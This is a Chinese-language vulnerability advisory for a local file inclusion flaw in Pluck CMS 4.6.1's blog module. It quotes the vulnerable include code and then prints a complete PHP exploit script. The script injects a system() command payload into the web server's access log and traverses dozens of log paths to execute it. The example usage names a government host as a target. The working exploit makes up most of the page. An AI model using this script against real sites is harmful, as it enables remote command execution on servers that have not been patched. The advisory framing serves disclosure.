Pluck module_pages_site.php模块本地文件包含漏洞


添加时间:
2009-03-27

系统编号:
WAVDB-01365
BUGTRAQ: 34207

影响版本:
Pluck CMS 4.6.1

程序介绍:

pluck是用php编写的简单内容管理系统。

漏洞分析:

pluck的\data\modules\blog\module_pages_site.php模块中没有正确地过滤用户所提交的请求参数:

...

$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
//Check if post exists, and include information
if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
include('data/settings/modules/blog/posts/'.$_GET['post']);
$module_page['viewpost'] = $post_title;
}
}
...
远程攻击者可以通过向服务器提交特制的HTTP POST请求包含任意本地资源,导致执行任意代码。


漏洞利用:

 
  1. <?php   
  2.   
  3. if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]\n");  
  4.   
  5. set_time_limit(0);  
  6. error_reporting(0);  
  7.   
  8. $host = $argv[1];  
  9. $port = $argv[2];  
  10. $path = $argv[3];  
  11. $command = $argv[4];  
  12.   
  13. //add something if not w00rking ;x  
  14.   
  15. $shell = array(    
  16.          "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",  
  17.          "../apache/logs/access.log",  
  18.          "../../apache/logs/access.log",  
  19.          "../../../apache/logs/access.log",  
  20.          "../../../../apache/logs/access.log",  
  21.          "../../../../../apache/logs/access.log",  
  22.          "../../../../../../apache/logs/access.log",  
  23.          "../../../../../../../apache/logs/access.log",  
  24.          "../../../../../../../../apache/logs/access.log",  
  25.          "../../../../../../../../../apache/logs/access.log",  
  26.          "../../../../../../../../../../apache/logs/access.log",  
  27.          "../../../../../../../../../../../apache/logs/access.log",  
  28.          "../var/log/httpd/access.log",  
  29.          "../../var/log/httpd/access.log",  
  30.          "../../../var/log/httpd/access.log",  
  31.          "../../../../var/log/httpd/access.log",  
  32.          "../../../../../var/log/httpd/access.log",  
  33.          "../../../../../../var/log/httpd/access.log",  
  34.          "../../../../../../../var/log/httpd/access.log",  
  35.          "../../../../../../../../var/log/httpd/access.log",  
  36.          "../../../../../../../../../var/log/httpd/access.log",  
  37.          "../../../../../../../../../../var/log/httpd/access.log",  
  38.          "../../../../../../../../../../../var/log/httpd/access.log",  
  39.          "../var/log/apache/access.log",  
  40.          "../../var/log/apache/access.log",  
  41.          "../../../var/log/apache/access.log",  
  42.          "../../../../var/log/apache/access.log",  
  43.          "../../../../../var/log/apache/access.log",  
  44.          "../../../../../../var/log/apache/access.log",  
  45.          "../../../../../../../var/log/apache/access.log",  
  46.          "../../../../../../../../var/log/apache/access.log",  
  47.          "../../../../../../../../../var/log/apache/access.log",  
  48.          "../../../../../../../../../../var/log/apache/access.log",  
  49.          "../../../../../../../../../../../var/log/apache/access.log",  
  50.          "../usr/local/apache2/logs/access.log",  
  51.          "../../usr/local/apache2/logs/access.log",  
  52.          "../../../usr/local/apache2/logs/access.log",  
  53.          "../../../../usr/local/apache2/logs/access.log",  
  54.          "../../../../../usr/local/apache2/logs/access.log",  
  55.          "../../../../../../usr/local/apache2/logs/access.log",  
  56.          "../../../../../../../usr/local/apache2/logs/access.log",  
  57.          "../../../../../../../../usr/local/apache2/logs/access.log",  
  58.          "../../../../../../../../../usr/local/apache2/logs/access.log",  
  59.          "../../../../../../../../../../usr/local/apache2/logs/access.log",  
  60.          "../../../../../../../../../../../usr/local/apache2/logs/access.log",   
  61.    );  
  62. function _hdr($int){   //Mia³o nie byæ file_get_contents  
  63.          
  64.         global $shell,$host,$path;  
  65.         $header .= "GET /$host/$path/$shell[$int]  HTTP/1.1\r\n";  
  66.         $header .= "Host: $host\r\n";  
  67.         $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";  
  68.         $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";  
  69.         $header .= "Accept-Language: en-us,en;q=0.5\r\n";  
  70.         $header .= "Accept-Encoding: gzip,deflate\r\n";  
  71.         $header .= "Connection: close\r\n\r\n";  
  72.         return $header;  
  73.   
  74.   
  75. }  
  76.   
  77.   
  78. function _inject($hosts,$ports){  
  79.       
  80.            $hnd = fsockopen($hosts,$ports,$errno$errstr, 30);  
  81.            if(!$hnddie("Injection errr $errstr\n");  
  82.            fwrite($hnd,_hdr(0));  
  83.            fclose($hnd);    
  84.   
  85.   
  86. }  
  87.   
  88. function _result($data){  
  89.   
  90.           $ret = explode(' e[Ho_trip ',$data);   
  91.             if($ret[1] != ""){  
  92.               for($i = 1;$i<count($ret);$i++){  
  93.                $ret_2 = explode(' d34th_trip',$ret[$i]);    
  94.                    if($i - count($ret) == -1){  
  95.                      if($ret_2[0] != ""){  
  96.                         echo($ret_2[0]);  
  97.                      } else {  
  98.                         die("Exploit failed!!\n");  
  99.                      }  
  100.                }   
  101.               }      
  102.                  
  103.             }  
  104.   
  105. }  
  106.   
  107. function _exploit($hosts,$paths){  
  108.   
  109.         global $shell;  
  110.         $rets = "";  
  111.         $count = count($shell);  
  112.   
  113.         for($i=1;$i<$count;$i++){  
  114.               
  115.             $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");  
  116.            _result($tab);  
  117.     
  118.         }  
  119.   
  120.            
  121. }  
  122. echo("---- pluck v 4.6.1 -----\n\n".  
  123.      "Autor: Alfons Luja\n".  
  124.      "Target: $host\n".  
  125.      "Path: $path\n".  
  126.      "Port: $port\n".  
  127.      "COM: $command\n".  
  128.      "Ex: poc.php www.target.com 80 pluck \"dir\"\n\n");  
  129.   
  130.     _inject($host,$port);  
  131.     _exploit($host,$path);  
  132.   
  133. ?>  



解决方案:
厂商补丁:
somp
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.pluck-cms.org/

信息来源:
<*来源:Alfons Luja

链接:http://secunia.com/advisories/34415/
*>